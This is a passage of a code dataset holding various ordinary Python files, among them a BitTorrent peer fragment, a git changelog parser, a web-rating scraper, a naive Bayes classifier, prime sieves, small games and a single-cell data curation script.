logging.info(\"length error!\")\r\n                self._send_interested_info()\r\n            elif type_id == 1:\r\n                logging.info(\"unchoked!\")\r\n                self._send_pieces_request()\r\n            elif type_id == 7:\r\n                index, begin = struct.unpack(\">II\", self._in_buffer[5:13])\r\n                if index == self._request_index and begin == self._request_begin:\r\n                    # hash only the block payload, skipping the 13-byte\r\n                    # length/id/index/begin header\r\n                    print(hashlib.sha1(self._in_buffer[13:length + 4]).digest())\r\n                    print(self._pieces_hash[self._request_index])\r\n                else:\r\n                    print(self._in_buffer)\r\n\r\n            self._in_buffer = b\"\"\r\n\r\n    def fileno(self):\r\n        '''\r\n        return sock fileno\r\n        '''\r\n        return self.mysock.fileno()\r\n\r\n    def send_buffer(self):\r\n        '''\r\n        send out of buffer\r\n        '''\r\n        buffer_length = len(self._out_buffer)\r\n        if buffer_length == 0:\r\n            return\r\n        logging.info(self._out_buffer)\r\n        sent = self.mysock.send(self._out_buffer)\r\n        self._out_buffer = self._out_buffer[sent:]\r\n\r\n    def receive_buffer(self):\r\n        '''\r\n        receive server response\r\n        '''\r\n        res = self.mysock.recv(4096)\r\n        if res == b\"\":\r\n            return False\r\n        self._in_buffer += res\r\n        self._handle_buffer()\r\n        return True\r\n\r\n\r\n    \r\n","sub_path":"service/peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"293851324","text":"\"\"\"\nThe parser module will traverse a git repository, gathering all the commits\nthat follow the AngularJS commit message convention, and linking them with\nthe releases they correspond to.\n\"\"\"\n\nimport git\nfrom typing import Dict, List\n\nfrom .models import Commit, Tag, Unreleased\n\n\ndef create_reverse_tag_index(repo: git.Repo) -> Dict[git.Commit, List[git.TagReference]]:\n    \"\"\" Create reverse index \"\"\"\n    reverse_tag_index = {}\n    for tagref in repo.tags:\n        commit = tagref.commit\n        if commit not in reverse_tag_index:\n            reverse_tag_index[commit] = []\n        reverse_tag_index[commit].append(tagref)\n    return reverse_tag_index\n\n\ndef group_commits(tags, commits):\n    tags = sorted(tags, key=lambda t: t.date)\n\n    # Adding the tag's commit manually because those seem to be skipped\n    commits.extend([Commit(t._commit) for t in tags])\n\n    # Sort the commits and filter out those not formatted correctly\n    commits = sorted(commits, key=lambda c: c.date)\n    commits = list(filter(lambda c: c.category, commits))\n    \n    for index, tag in 
enumerate(tags):\n        # Everything is sorted in ascending order (earliest to most recent), \n        # So everything before the first tag belongs to that one\n        if index == 0:\n            children = filter(lambda c: c.date <= tag.date, commits)\n        else:\n            prev_tag = tags[index-1]\n            children = filter(lambda c: prev_tag.date < c.date <= tag.date, commits)\n        \n        for child in children:\n            commits.remove(child)\n            tag.add_commit(child)\n    \n    left_overs = list(filter(lambda c: c.date > tags[-1].date, commits))\n    return left_overs\n\n\ndef traverse(base_dir):\n    repo = git.Repo(base_dir)\n    tags = repo.tags\n\n    if len(tags) < 1:\n        raise ValueError('Not enough tags to generate changelog')\n\n    wrapped_tags = []\n    for tagref in tags: \n        t = Tag(\n            name=tagref.name, \n            date=tagref.commit.committed_date, \n            commit=tagref.commit)\n        wrapped_tags.append(t)\n    \n    commits = list(repo.iter_commits('master'))\n    commits = list(map(Commit, commits)) # Convert to Commit objects\n\n    # Iterate through the commits, adding them to a tag's commit list\n    # if it belongs to that release\n    left_overs = group_commits(wrapped_tags, commits)\n\n    # If there are any left over commits (i.e. commits created since \n    # the last release\n    if left_overs:\n        unreleased = Unreleased(left_overs)\n    else:\n        unreleased = None\n\n    return wrapped_tags, unreleased\n\n","sub_path":"auto_changelog/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"373787488","text":"import requests\nimport csv\nfrom multiprocessing import Pool\nfrom time import sleep\n\n\ndef get(url):\n    sleep(1)\n    r = requests.get(url)\n    return r.text\n\n\ndef write_csv(data):\n    with open('ws.csv', 'a') as f:\n        order = ['name', 'url', 'discription', 'traffic', 'percent']\n        writer = csv.DictWriter(f, fieldnames=order)\n        writer.writerow(data)\n\ndef get_page_data(text):\n    \"\"\"\n    Parse data from all text\n    :param text: downloaded from website data\n    :return: data{}\n\n    \"\"\"\n    data = text.strip().split('\\n')[1:]\n\n    for row in data:\n        colums = row.strip().split('\\t')\n        print(colums)\n        name = colums[0]\n        url = colums[1]\n        discription = colums[2]\n        traffic = colums[3]\n        percent = colums[4]\n\n        data = {'name': name,\n                'url': url,\n                'discription': discription,\n                'traffic': traffic,\n                'percent': percent}\n        # print(data)\n        write_csv(data)\n\n\n\ndef url_to_text(url):\n    text = get(url)\n    get_page_data(text)\n\n\ndef main():\n    #7304\n    url = 'https://www.liveinternet.ru/rating/ru//today.tsv?page={}'\n    urls = [url.format(str(i)) for i in range(1, 7305)]\n\n    with Pool(10) as p:\n        p.map(url_to_text, urls)\n\n\n\nif __name__ == '__main__':\n    main()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"266267432","text":"#!python3\r\nimport pyperclip,re\r\ntext=str(pyperclip.paste())\r\n#print(text)\r\nphoneRegx=re.compile(r'''(\r\n1\\d{10}\r\n)''',re.VERBOSE)\r\nphones=''\r\nfor groups in phoneRegx.findall(text):\r\n    #print(groups)\r\n    phones+=groups+'\\n'\r\npyperclip.copy(phones)","sub_path":"py_files/common/splitPhone.py","file_name":"splitPhone.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"503896619","text":"import json\nimport numpy as np\nimport scipy\nimport math\nfrom decimal import Decimal\nfrom scipy.special import comb\nimport scipy.stats\nfrom 
nltk.stem.porter import *\n\n\nwith open(\"reviews.json\", mode=\"r\", encoding=\"utf-8\") as f:\n reviews = json.load(f)\n\ndef createFreqs(trainSet, type, frequencies):\n for review in trainSet:\n for line in review[\"content\"]:\n for word in line:\n word_exists = False\n word[0] = word[0].lower()\n if word[0] in frequencies:\n word_exists = True\n if not word_exists:\n frequencies[word[0]] = {\"POS\": 0, \"NEG\": 0}\n frequencies[word[0]][type] += 1\n\ndef test(testSet, freqs, logP_c):\n results = {}\n for review in testSet:\n results[review[\"cv\"]] = {\"target\": review[\"sentiment\"], \"logP(POS)\": 0.0, \"logP(NEG)\": 0.0}\n for line in review[\"content\"]:\n for w in line:\n word_exists = False\n w[0] = w[0].lower()\n if w[0] in freqs:\n word_exists = True\n if word_exists:\n results[review[\"cv\"]][\"logP(POS)\"] += freqs[w[0]][\"logP(POS)\"]\n results[review[\"cv\"]][\"logP(NEG)\"] += freqs[w[0]][\"logP(NEG)\"]\n results[review[\"cv\"]][\"logP(POS)\"] += logP_c[\"POS\"]\n results[review[\"cv\"]][\"logP(NEG)\"] += logP_c[\"NEG\"]\n return results\n\n# Calculate prediction accuracy of positive review test set\ndef getAccuracy(testResults):\n correct_count = 0\n decisions = []\n for review in testResults:\n if testResults[review][\"logP(POS)\"] > testResults[review][\"logP(NEG)\"]:\n prediction = \"POS\"\n else:\n prediction = \"NEG\"\n if testResults[review][\"target\"] == prediction:\n correct_count += 1\n decisions.append(\"+\")\n else:\n decisions.append(\"-\")\n accuracy = correct_count / len(testResults)\n return accuracy, decisions\n\nfolds = 10\npos_scores = []\nneg_scores = []\nfor i in range(folds):\n print(\"Test fold is index \" + str(i) + \", \" + str(10+i) + \", \" + str(20+i) + \", ...\")\n train_pos = [review for review in reviews if (review[\"cv\"] % folds != i and review[\"sentiment\"] == \"POS\")]\n train_neg = [review for review in reviews if (review[\"cv\"] % folds != i and review[\"sentiment\"] == \"NEG\")]\n test_pos = [review for review in reviews if (review[\"cv\"] % folds == i and review[\"sentiment\"] == \"POS\")]\n test_neg = [review for review in reviews if (review[\"cv\"] % folds == i and review[\"sentiment\"] == \"NEG\")]\n\n\n frequencies = {}\n createFreqs(train_pos, \"POS\", frequencies)\n createFreqs(train_neg, \"NEG\", frequencies)\n\n kappa = 1\n # Count total appearance frequencies\n total = {\"POS\": len(frequencies) * kappa, \"NEG\": len(frequencies) * kappa}\n for word in frequencies:\n total[\"POS\"] += frequencies[word][\"POS\"]\n total[\"NEG\"] += frequencies[word][\"NEG\"]\n # Get the log prob of a word for each sentiment\n for word in frequencies:\n frequencies[word][\"logP(POS)\"] = np.log((frequencies[word][\"POS\"] + kappa) / (total[\"POS\"]))\n frequencies[word][\"logP(NEG)\"] = np.log((frequencies[word][\"NEG\"] + kappa) / (total[\"NEG\"]))\n\n total_reviews = len(train_pos) + len(train_neg)\n logP_c = {\"POS\": np.log(len(train_pos)/total_reviews), \"NEG\": np.log(len(train_neg)/total_reviews)}\n pos_test_results = test(test_pos, frequencies, logP_c)\n neg_test_results = test(test_neg, frequencies, logP_c)\n\n k1_pos_accuracy, k1_pos_results = getAccuracy(pos_test_results)\n k1_neg_accuracy, k1_neg_results = getAccuracy(neg_test_results)\n print(\"Positive review accuracy: \", k1_pos_accuracy)\n print(\"Negative review accuracy: \", k1_neg_accuracy)\n pos_scores.append(k1_pos_accuracy)\n neg_scores.append(k1_neg_accuracy)\n print(\"\")\n\n\nprint(\"Average fold positive review accuracy: \", np.mean(pos_scores))\nprint(\"Average 
fold negative review accuracy: \", np.mean(neg_scores))\n\nprint(\"Variance of positive review accuracy fold: \", np.var(pos_scores))\nprint(\"Variance of negative review accuracy fold: \", np.var(neg_scores))","sub_path":"Project_1/Bayes_CV.py","file_name":"Bayes_CV.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585626683","text":"import os\nimport csv\nimport copy\nimport logging\n\nfrom six.moves import configparser\n\nfrom oskar import SettingsTree\nfrom threading import Thread\nfrom multiprocessing import Process\nfrom dlg.drop import BarrierAppDROP\n\nfrom spead_recv import SpeadReceiver\nfrom spead_send import SpeadSender\n\nlogger = logging.getLogger(__name__)\n\n\nclass SignalGenerateAndAverageDrop(BarrierAppDROP):\n\n def initialize(self, **kwargs):\n\n # spead inputs\n self.stream_port = int(kwargs.get('stream_port', 51000))\n self.disconnect_tolerance = int(kwargs.get('disconnect_tolerance', 0))\n\n # oskar inputs\n self.start_freq = kwargs.get('start_freq')\n self.freq_step = kwargs.get('freq_step')\n self.num_freq_steps = int(kwargs.get('num_freq_steps'))\n self.use_gpus = int(kwargs.get('use_gpus', 0))\n self.telescope_model_path = kwargs.get('telescope_model_path')\n self.sky_model_file_path = kwargs.get('sky_model_file_path')\n self.obs_length = kwargs.get('obs_length', '06:00:00.0')\n self.num_time_steps = int(kwargs.get('num_time_steps', 5))\n self.use_adios = int(kwargs.get('use_adios', 0))\n\n # SPEAD send config template\n self.spead_send_conf = {\n \"stream_config\":\n {\n \"max_packet_size\": 1472,\n \"rate\": 0.0,\n \"burst_size\": 8000,\n \"max_heaps\": 4\n },\n \"stream\":\n {\n \"port\": 0,\n \"host\": \"127.0.0.1\"\n },\n \"write_ms\": 0\n }\n\n # SPEAD recv and avg local config template\n self.spead_avg_conf = {\n \"stream_config\":\n {\n \"max_packet_size\": 1472,\n \"rate\": 0.0,\n \"burst_size\": 8000,\n \"max_heaps\": 4\n },\n \"streams\":\n [],\n \"as_relay\": 1,\n \"relay\":\n {\n \"stream_config\":\n {\n \"max_packet_size\": 1472,\n \"rate\": 0.0,\n \"burst_size\": 8000,\n \"max_heaps\": 4\n },\n \"stream\":\n {\n \"port\": self.stream_port,\n \"host\": \"\"\n }\n }\n\n }\n\n # OSKAR config\n self.oskar_conf = {\n \"General\":\n {\n \"app\": \"oskar_sim_interferometer\",\n \"version\": \"2.7.0\"\n },\n \"simulator\":\n {\n \"max_sources_per_chunk\": 50000,\n \"use_gpus\": \"false\",\n \"cuda_device_ids\": 0,\n \"num_devices\": 1,\n \"double_precision\": \"false\",\n },\n \"sky\":\n {\n \"oskar_sky_model/file\": \"\"\n },\n \"observation\":\n {\n \"phase_centre_ra_deg\": 201.4,\n \"phase_centre_dec_deg\": -43.0,\n \"start_frequency_hz\": 0,\n \"num_channels\": 1,\n \"frequency_inc_hz\": 0,\n \"start_time_utc\": \"01-01-2000 20:00:00.0\",\n \"length\": self.obs_length,\n \"num_time_steps\": self.num_time_steps\n },\n \"telescope\":\n {\n \"input_directory\": self.telescope_model_path\n }\n }\n\n self.relay = None\n self.relay_process = None\n self.oskar_process = []\n\n self.spead_send = []\n self.spead_avg_local = []\n\n sky_model_file_list = self._load_sky_model_file_list(self.sky_model_file_path)\n\n for i in range(self.num_freq_steps):\n # creating N number of oskar and spead send configs\n spead_conf = copy.deepcopy(self.spead_send_conf)\n spead_conf[\"stream\"][\"port\"] = 41000 + i\n\n freq = self.start_freq + (self.freq_step * i)\n oskar_conf = copy.deepcopy(self.oskar_conf)\n oskar_conf[\"observation\"][\"start_frequency_hz\"] = freq\n 
oskar_conf[\"observation\"][\"frequency_inc_hz\"] = self.freq_step\n oskar_conf[\"simulator\"][\"cuda_device_ids\"] = i\n oskar_conf[\"simulator\"][\"use_gpus\"] = bool(self.use_gpus)\n\n # set model file for specific freq\n for key, value in sky_model_file_list:\n if key >= freq:\n oskar_conf[\"sky\"][\"oskar_sky_model/file\"] = value\n break\n\n if not oskar_conf[\"sky\"][\"oskar_sky_model/file\"]:\n raise Exception(\"Could not find sky model for freq %f\" % freq)\n\n self.spead_send.append({\"spead\": spead_conf, \"oskar\": oskar_conf})\n\n # Setting relay incoming streams\n self.spead_avg_local.append({\"host\": \"127.0.0.1\", \"port\": 41000+i})\n\n self.spead_avg_conf[\"streams\"] = self.spead_avg_local\n\n super(SignalGenerateAndAverageDrop, self).initialize(**kwargs)\n\n # list of csv values, each line is freq, abs_path_model_file\n def _load_sky_model_file_list(self, file_path):\n file_map = []\n with open(file_path) as csvfile:\n read_csv = csv.reader(csvfile, delimiter=',')\n for row in read_csv:\n file_map.append((int(row[0]), row[1]))\n return sorted(file_map, key=lambda kv: kv[0])\n\n def _start_oskar_process(self, spead_config, oskar_config_path):\n oskar = SpeadSender(spead_config=spead_config,\n oskar_settings=SettingsTree(\"oskar_sim_interferometer\",\n settings_file=oskar_config_path))\n oskar.run()\n oskar.finalise()\n\n def run(self):\n logger.info(\"SignalDrop Starting\")\n\n # assume a downstream AveragerSinkDrop\n self.outputs[0].write(b'init')\n\n # should be the IP address of the AveragerSinkDrop\n ip_address_sink = self.outputs[0].get_consumers_nodes()[0]\n\n self.spead_avg_conf[\"relay\"][\"stream\"][\"host\"] = ip_address_sink\n self.spead_avg_conf[\"relay\"][\"stream\"][\"port\"] = self.stream_port\n\n # pass this IP addr to spread relay config\n self.relay = SpeadReceiver(spead_config=self.spead_avg_conf,\n disconnect_tolerance=self.disconnect_tolerance)\n self.relay_thread = Thread(target=self.relay.run, args=())\n self.relay_thread.start()\n\n for i, conf in enumerate(self.spead_send):\n conf_path = \"/tmp/sim%d.ini\" % i\n parser = configparser.ConfigParser()\n parser.read_dict(conf['oskar'])\n with open(conf_path, 'w') as conf_file:\n parser.write(conf_file, space_around_delimiters=False)\n p = Process(target=self._start_oskar_process, args=(conf['spead'], conf_path))\n self.oskar_process.append(p)\n\n for oskar in self.oskar_process:\n oskar.start()\n\n for oskar in self.oskar_process:\n oskar.join()\n\n self.relay_thread.join()\n self.relay.close()\n\n logger.info(\"SignalDrop Finished\")\n","sub_path":"summit_demo/oskar/ingest/signal_drop.py","file_name":"signal_drop.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"610494062","text":"import os\nimport math\nos.chdir('d:/SoHyun/문서/2DGP/수업내용/4주차')\nimport helper\nfrom pico2d import *\nRES_DIR='../res'\n\n\n\nopen_canvas()\n\nclass Grass:\n\tdef __init__(self):\n\t\tself.image=load_image(RES_DIR+'/grass.png')\n\tdef draw(self): \n\t\tself.image.draw(400,30)\n\tdef update(self):\n\t\tpass\n\nclass Boy:\n\tdef __init__(self):\n\t\tself.x, self.y = 400, 85\n\t\tself.dx, self.dy=0,0\n\t\tself.fidx=0\n\t\tself.image=load_image(RES_DIR+'/run_animation.png')\n\t\tself.towardx = 0\n\t\tself.towardy = 0 \n\tdef draw(self): \n\t\tself.image.clip_draw(self.fidx*100,0,100,100,self.x, self.y)\n\tdef update(self):\n\t\tself.x+=self.dx\n\t\tself.y+=self.dy\n\t\tself.fidx=(self.fidx+1)%8\n\tdef check(self):\n\t\tif 
(self.x, self.y) == (self.towardx, self.towardy): # reached the click target, so stop moving (was `self.check==True`, comparing the method itself)\n\t\t\tself.dx, self.dy=0,0\n\nboy=Boy()\n\n\n\t\t\t\n\ngrass=Grass()\n\n\n\ndef handle_events():\n\tglobal running\t\n\tglobal boy\n\tevents=get_events()\n\tfor event in events:\n\t\tif event.type == SDL_QUIT:\n\t\t\trunning = False\n\t\telif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\n\t\t\trunning=False\n\t\telif event.type == SDL_MOUSEBUTTONDOWN:\n\t\t\tboy.towardx = event.x\n\t\t\tboy.towardy = get_canvas_height()-event.y-1\n\t\t\tboy.dx, boy.dy=helper.delta((boy.x,boy.y), (boy.towardx, boy.towardy), 5)\n\n\n\n\n\nrunning = True\nwhile running:\n\tclear_canvas()\n\tgrass.draw()\n\tboy.draw()\n\tupdate_canvas()\n\n\thandle_events()\n\t(posx, posy), done = helper.move_toward((boy.x, boy.y), (boy.dx, boy.dy), (boy.towardx, boy.towardy))\n\tif done:\n\t\tboy.x, boy.y=posx,posy\n\n\tboy.update()\n\tgrass.update()\n\n\tif boy.x>get_canvas_width():\n\t\trunning=False\n\n\tdelay(0.01)\n\nclose_canvas()","sub_path":"수업내용/4주차/py_02_06_2019182038_1.py","file_name":"py_02_06_2019182038_1.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"570711130","text":"__author__ = 'Дмитрий'\n\nimport math\n\ndef atkin( begin = 1,end = 100000):\n result = [ ]\n if begin <= 5:\n result.append(2)\n result.append(3)\n result.append(5)\n\n limit = int(math.sqrt(end)) +1\n sieve = [False]*(end + 1) # was len(range(begin, end + 1)), which is too short to index sieve[end]\n d = lambda z: z % 12\n for x in range( begin,limit ):\n for y in range( begin,limit ):\n\n n = 4*x**2 + y**2\n if ( n <= end ) and ( d(n) == 1 or d(n) == 5 ):\n sieve[n] = not sieve[n]\n\n n = 3*x**2 + y**2\n if ( n <= end ) and d(n) == 7:\n sieve[n] = not sieve[n]\n\n if x > y:\n n = 3*x**2 - y**2\n if ( n <= end ) and d(n) == 11:\n sieve[n] = not sieve[n]\n\n for index in range(5,limit):\n if sieve[index]:\n for jndex in range(index**2,end + 1,index**2):\n sieve[jndex]=False\n\n for index in range(7,end + 1):\n if sieve[index]:\n result.append(index)\n\n return result\n\n\n\nprint(atkin(1,200000)[10000])\n\n\n\n\n\n","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"197891834","text":"from util import Stack, Graph\n\ndef earliest_ancestor(ancestors, starting_node):\n ancestor_tree = Graph()\n for (parent, child) in ancestors:\n \tancestor_tree.add_vertex(parent)\n \tancestor_tree.add_vertex(child)\n \tancestor_tree.add_edge(child, parent)\n stack = Stack()\n stack.push([starting_node])\n longest_path = 1\n earliest_ancestor = -1\n while stack.size() > 0:\n \tpath = stack.pop()\n \tvertex = path[-1]\n \tif (len(path) >= longest_path and vertex < earliest_ancestor) or (len(path) > longest_path):\n \t\tearliest_ancestor = vertex\n \t\tlongest_path = len(path)\n \tfor neighbor in ancestor_tree.get_neighbors(vertex):\n \t\tnew_path = list(path)\n \t\tnew_path.append(neighbor)\n \t\tstack.push(new_path)\n \n return earliest_ancestor","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"145930893","text":"import random\nimport time\n\n# ACTIVITY #1\n# class ChessBoard():\n# coordinates for everything\n# which side each piece belongs to\n# Whose turn 
it is\n\n# class ChessPiece():\n# properties of each piece\n# captured pieces\n\n# ACTIVITY 2\nmoves = 0\n\n\nclass Healer:\n # Check = shows all of the character's attributes like:\n # level\n # name\n # starting health\n # defense\n # attack\n # Heal self = + 50-100 health to self (character specific; dictated by lv)\n # Hit = invoked by an attacker when they attack\n # Fiery Chasm + Pyroclastic Rain = attacks\n def __init__(self, level, name, orientation):\n self.level = level # 3\n self.name = name\n self.health = 100 + ((level + 1) * 10)\n self.defense = (level + 1) * 3\n self.attack = (level + 1) * 5\n if orientation == \"f\":\n self.pos_pronoun = \"her\"\n elif orientation == \"m\":\n self.pos_pronoun = \"his\"\n else:\n self.pos_pronoun = \"their\"\n\n def check(self):\n print(\"\\n\\n\", self.name, \"is checking\", self.pos_pronoun, \"stats...\\nMage Level:\", self.level, \"\\nName:\",\n self.name, \"\\nMax Health:\", self.health, \"\\nDefense:\", self.defense, \"\\nAttack:\", self.attack)\n\n def heal_self(self):\n self.health += random.randint(10, 20) * (self.level + 1)\n if self.health > 100 + ((self.level + 1) * 10):\n self.health = 100 + ((self.level + 1) * 10)\n print(\"\\n\", self.name, \"cast 'Heal self'!\\n\", self.name + \"'s Health:\", str(self.health) + \"/\" +\n str(100 + ((self.level + 1) * 10)), \"(\" + str((self.health * 100) // (100 + ((self.level + 1) * 10))) +\n \"%)\")\n\n def hit(self, damage, cause, attacker):\n print(\"\\n\", self.name, \"took {} damage from '{}' by the hand of {}!\\n\".format(damage, cause, attacker),\n self.name + \"'s Health:\", str(self.health) + \"/\" + str(100 + ((self.level + 1) * 10)), \"(\" +\n str((self.health * 100) // (100 + ((self.level + 1) * 10))) + \"%)\")\n\n def fiery_chasm(self, target):\n self_hit = random.randint(-3, 1) # value 1 (a 1-in-5 chance) means the caster is caught in the blast\n old_health = target.health\n target.health -= self.attack + random.randint(-15, 15)\n damage = old_health - target.health\n target.hit(damage, \"Fiery Chasm\", self.name)\n if self_hit == 1: # was `self_hit is True`, which an int can never satisfy\n self.health -= round((damage / 2) - self.defense)\n print(\"\\n\", self.name, \"took\", str(round((damage / 2) - self.defense)), \"damage after falling into\", self.pos_pronoun, \"own 'Fiery Chasm'!\\n\", self.name + \"'s Health:\", self.health)\n\n def pyro_rain(self, target):\n old_health = target.health\n target.health -= self.attack + random.randint(0, 20)\n damage = old_health - target.health\n target.hit(damage, \"Pyroclastic Rain\", self.name)\n\n\nclass DPS:\n # Check = shows all of the character's attributes like:\n # level\n # name\n # starting health\n # defense\n # attack\n # Defend = lose 5 health, get nothing, or gain 6-18 (character specific; dictated by lv)\n # Hit = invoked by an attacker when they attack\n # Spin Strike + Spear Throw = attacks\n def __init__(self, level, name, orientation):\n self.level = level # 4\n self.name = name\n self.health = 100 + ((level + 1) * 5)\n self.defense = (level + 1) * 3\n self.attack = (level + 1) * 10\n if orientation == \"f\":\n self.pos_pronoun = \"her\"\n elif orientation == \"m\":\n self.pos_pronoun = \"his\"\n else:\n self.pos_pronoun = \"their\"\n\n def check(self):\n print(\"\\n\\n\", self.name, \"is checking\", self.pos_pronoun, \"stats...\\nWarrior Level:\", self.level, \"\\nName:\",\n self.name, \"\\nMax Health:\", self.health, \"\\nDefense:\", self.defense, \"\\nAttack:\", self.attack)\n\n def defend(self):\n defended = random.randint(-1, 3) * (self.defense + 1)\n self.health += defended\n if self.health > 100 + ((self.level + 1) 
* 5):\n self.health = 100 + ((self.level + 1) * 5)\n if defended <= 0:\n print(\"\\n\", self.name, \"'defended,' but it didn't help!\\n\", self.name + \"'s Health:\", str(self.health) + \"/\"\n + str(100 + ((self.level + 1) * 5)), \"(\" + str((self.health * 100) // (100 + ((self.level + 1) * 5)))\n + \"%)\")\n else:\n print(\"\\n\", self.name, \"'defended'!\\n\", self.name + \"'s Health:\", str(self.health) + \"/\" +\n str(100 + ((self.level + 1) * 5)), \"(\" + str((self.health * 100) // (100 + ((self.level + 1) * 5))) +\n \"%)\")\n\n def hit(self, damage, cause, attacker):\n print(\"\\n\", self.name, \"took {} damage from '{}' by the hand of {}!\\n\".format(damage, cause, attacker),\n self.name + \"'s Health:\", str(self.health) + \"/\" + str(100 + ((self.level + 1) * 5)), \"(\" +\n str((self.health * 100) // (100 + ((self.level + 1) * 5))) + \"%)\")\n\n def spin_strike(self, target):\n old_health = target.health\n target.health -= ((self.attack + random.randint(-5, 15)) - target.defense)\n damage = old_health - target.health\n target.hit(damage, \"Spinning Strike\", self.name)\n\n def spear_throw(self, target):\n old_health = target.health\n target.health -= ((self.attack + random.randint(-7, 20)) - target.defense)\n damage = old_health - target.health\n target.hit(damage, \"Spear Throw\", self.name)\n\n\nC = Healer(4, \"Clytemnestra\", \"f\")\nO = DPS(4, \"Orestes\", \"m\")\nC.check()\ntime.sleep(random.randint(5, 10))\nO.check()\ntime.sleep(random.randint(5, 10))\nwhile C.health > 0 and O.health > 0:\n if C.health < 50:\n C.heal_self()\n elif O.health >= 63:\n C.fiery_chasm(O)\n elif O.health < 63:\n C.pyro_rain(O)\n time.sleep(random.randint(3, 8))\n moves += 1\n if O.health <= 0:\n break\n elif O.health < 40:\n O.defend()\n elif C.health >= 75:\n O.spin_strike(C)\n elif C.health < 75:\n O.spear_throw(C)\n time.sleep(random.randint(3, 8))\n moves += 1\nif C.health > 0 and O.health > 0:\n print(\"\\\"Never excuse—for when the players are all\\\\dead, there needs none to be blamed,\\\" - Shakespeare, A \\\nMidsummer Night's Dream (5.1.346-347).\")\nelif C.health > 0:\n print(\"\\n\", O.name, \"has perished at\", O.health, \"health!\\n\", C.name, \"stands victorious with\", C.health,\n \"health remaining after\", str(moves), \"moves!\")\nelif O.health > 0:\n print(\"\\n\", C.name, \"has perished at\", C.health, \"health!\\n\", O.name, \"stands victorious with\", O.health,\n \"health remaining after\", str(moves), \"moves!\")\n","sub_path":"Practice8.py","file_name":"Practice8.py","file_ext":"py","file_size_in_byte":6638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"135028926","text":"import anndata\nimport numpy as np\nimport pandas as pd\nimport scanpy.api as sc\n\nimport utils.hgnc\nimport utils.ontology\n\n\ndef basic_curation(adata):\n adata.obs[\"assay\"] = \"Microwell-seq\"\n adata.obs[\"assay_ontology\"] = \"\"\n adata.obs[\"disease_ontology\"] = \"PATO:0000461\"\n adata.obs[\"disease\"] = utils.ontology.get_ontology_label(\"PATO:0000461\")\n\n adata.uns[\"organism_ontology\"] = \"NCBITaxon:9606\"\n adata.uns[\"organism\"] = utils.ontology.get_ontology_label(\"NCBITaxon:9606\")\n adata.uns[\"title\"] = \"Construction of a human cell landscape at single-cell level\"\n adata.uns[\"contributors\"] = [\n {\"name\": \"Huiyu Sun\", \"institution\": \"Zhejiang University School of Medicine\", \"email\": \"sunhuiyu@zju.edu.cn\"},\n {\"name\": \"Guoji Guo\", \"institution\": \"Zhejiang University School of Medicine\", \"email\": 
\"ggj@zju.edu.cn\"},\n ]\n\n adata.uns[\"publication_doi\"] = \"https://doi.org/10.1038/s41586-020-2157-4\"\n\n adata.uns[\"project_name\"] = adata.uns[\"title\"]\n adata.uns[\"project_description\"] = (\n \"Single-cell analysis is a valuable tool for dissecting cellular heterogeneity in complex systems. \"\n \"However, a comprehensive single-cell atlas has not been achieved for humans. Here we use single-cell \"\n \"mRNA sequencing to determine the cell-type composition of all major human organs and construct a scheme \"\n \"for the human cell landscape (HCL). We have uncovered a single-cell hierarchy for many tissues that have \"\n \"not been well characterized. We established a 'single-cell HCL analysis' pipeline that helps to define \"\n \"human cell identity. Finally, we performed a single-cell comparative analysis of landscapes from human \"\n \"and mouse to identify conserved genetic networks. We found that stem and progenitor cells exhibit \"\n \"strong transcriptomic stochasticity, whereas diferentiated cells are more distinct. Our results provide a\"\n \"useful resource for the study of human biology.\"\n )\n adata.uns[\"project_protocol_links\"] = []\n adata.uns[\"project_raw_data_links\"] = [\"https://figshare.com/articles/HCL_DGE_Data/7235471\"]\n adata.uns[\"project_other_links\"] = [\n \"https://db.cngb.org/HCL/\",\n \"https://github.com/ggjlab/HCL/\",\n ]\n\n\ndef remix(adata):\n\n # Handle tissue. This one has lots of them, and the original name collides with the corpora name\n adata.obs.rename(columns={\"tissue\": \"original_tissue\"}, inplace=True)\n tissue_ontology_map = {\n \"AdultLung\": \"UBERON:0002048\",\n \"FetalIntestine\": \"UBERON:0000160\",\n \"AdultAdrenalGland\": \"UBERON:0002369\",\n \"AdultKidney\": \"UBERON:0002113\",\n \"FetalKidney\": \"UBERON:0002113\",\n \"AdultPleura\": \"UBERON:0000977\",\n \"FetalPancreas\": \"UBERON:0001264\",\n \"FetalMuscle\": \"UBERON:0001630\",\n \"FetalLiver\": \"UBERON:0002107\",\n \"AdultPeripheralBlood\": \"UBERON:0000178\",\n \"AdultTransverseColon\": \"UBERON:0001157\",\n \"CordBloodCD34P\": \"UBERON:0012168\",\n \"AdultSpleen\": \"UBERON:0002106\",\n \"AdultStomach\": \"UBERON:0000945\",\n \"FetalAdrenalGland\": \"UBERON:0002369\",\n \"FetalBrain\": \"UBERON:0000955\",\n \"FetalMaleGonad\": \"UBERON:0000473\",\n \"AdultOmentum\": \"UBERON:0003688\",\n \"AdultThyroid\": \"UBERON:0002046\",\n \"AdultEsophagus\": \"UBERON:0001043\",\n \"AdultLiver\": \"UBERON:0002107\",\n \"AdultTrachea\": 